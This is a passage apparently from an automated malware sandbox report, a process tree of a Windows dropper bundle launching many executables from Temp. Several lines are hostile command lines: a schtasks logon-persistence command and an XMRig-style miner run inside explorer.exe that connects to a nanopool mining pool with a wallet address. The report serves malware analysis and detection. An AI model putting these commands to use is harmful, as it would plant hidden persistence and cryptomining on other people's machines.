        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
        10⤵
        
        PID:2180
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
        10⤵
        
        PID:2264
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1
        10⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
        10⤵
        Loads dropped DLL
        
        PID:3752
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
        10⤵
        
        PID:5168
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
        10⤵
        
        PID:4884
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
        10⤵
        
        PID:3436
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
        10⤵
        
        PID:4380
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4536 /prefetch:8
        10⤵
        
        PID:4840
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5684 /prefetch:2
        10⤵
        
        PID:5920
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5596 /prefetch:8
        10⤵
        
        PID:6012
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3912 /prefetch:8
        10⤵
        
        PID:5480
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
        10⤵
        
        PID:5496
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3552 /prefetch:8
        10⤵
        
        PID:5668
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:8
        10⤵
        
        PID:5696
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 /prefetch:8
        10⤵
        
        PID:6888
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
        10⤵
        
        PID:2232
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
        10⤵
        
        PID:6304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2060,11030181678787472891,8346480824831003653,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5912 /prefetch:8
        10⤵
        
        PID:3260
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        9⤵
        
        PID:496
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8651846f8,0x7ff865184708,0x7ff865184718
        10⤵
        
        PID:5272
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
        9⤵
        
        PID:7156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff8651846f8,0x7ff865184708,0x7ff865184718
        10⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\41-e343d-bc0-df8b1-4299a5fd7f0e0\Gaemotiqucu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\41-e343d-bc0-df8b1-4299a5fd7f0e0\Gaemotiqucu.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4100
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tgo1d5jr.qao\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:6076
        
        C:\Users\Admin\AppData\Local\Temp\tgo1d5jr.qao\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\tgo1d5jr.qao\GcleanerEU.exe /eufive
        10⤵
        
        PID:3188
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 228
        11⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5256
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5kp2zn2z.jk0\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:5712
        
        C:\Users\Admin\AppData\Local\Temp\5kp2zn2z.jk0\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\5kp2zn2z.jk0\installer.exe /qn CAMPAIGN="654"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:5364
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5kp2zn2z.jk0\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5kp2zn2z.jk0\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630950064 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        Enumerates connected drives
        
        PID:5652
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ri2jhtj3.2tm\anyname.exe & exit
        9⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\ri2jhtj3.2tm\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\ri2jhtj3.2tm\anyname.exe
        10⤵
        Executes dropped EXE
        
        PID:5224
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\izbprpzk.vun\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\izbprpzk.vun\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\izbprpzk.vun\gcleaner.exe /mixfive
        10⤵
        Executes dropped EXE
        
        PID:5188
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 284
        11⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5532
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tl11cze2.jxy\autosubplayer.exe /S & exit
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:440
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4596
    - - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11f251db82fb7b.exe
        
        Tue11f251db82fb7b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5116
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Executes dropped EXE
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3080
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:4632
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:5852
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5556
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:4352
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Executes dropped EXE
        
        PID:3188
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:5808
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:1408
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:2440
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5176
        
        C:\Users\Admin\AppData\Roaming\5310996.exe
        
        "C:\Users\Admin\AppData\Roaming\5310996.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4164
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4164 -s 2296
        9⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:888
        
        C:\Users\Admin\AppData\Roaming\3531744.exe
        
        "C:\Users\Admin\AppData\Roaming\3531744.exe"
        8⤵
        Executes dropped EXE
        
        PID:4512
        
        C:\Users\Admin\AppData\Roaming\6436927.exe
        
        "C:\Users\Admin\AppData\Roaming\6436927.exe"
        8⤵
        Executes dropped EXE
        
        PID:2472
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 332
        9⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"
        7⤵
        Executes dropped EXE
        
        PID:5236
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 276
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5296
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5296 -s 1672
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:5416
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:5568
        
        C:\Users\Admin\AppData\Local\Temp\is-DQVRR.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DQVRR.tmp\setup_2.tmp" /SL5="$30202,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        Executes dropped EXE
        
        PID:5368
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:5952
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5044
    - - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue1109eec571ac.exe
        
        Tue1109eec571ac.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:3928
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 280
        6⤵
        Drops file in Windows directory
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4672
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4496
    - - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11bc0507b56295.exe
        
        Tue11bc0507b56295.exe
        5⤵
        Executes dropped EXE
        
        PID:4552
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 280
        6⤵
        Drops file in Windows directory
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4556
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4568
    - - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        Tue11e4e580f2e8141a3.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4584
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:2384
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5148
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5800
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:3376
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5856
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5308
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4696
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:6120
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4880
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5276
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5332
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:1908
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5448
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:1816
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6028
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:1028
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4804
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5412
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5064
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:3572
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5240
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2216
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4148
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5948
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4824
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5516
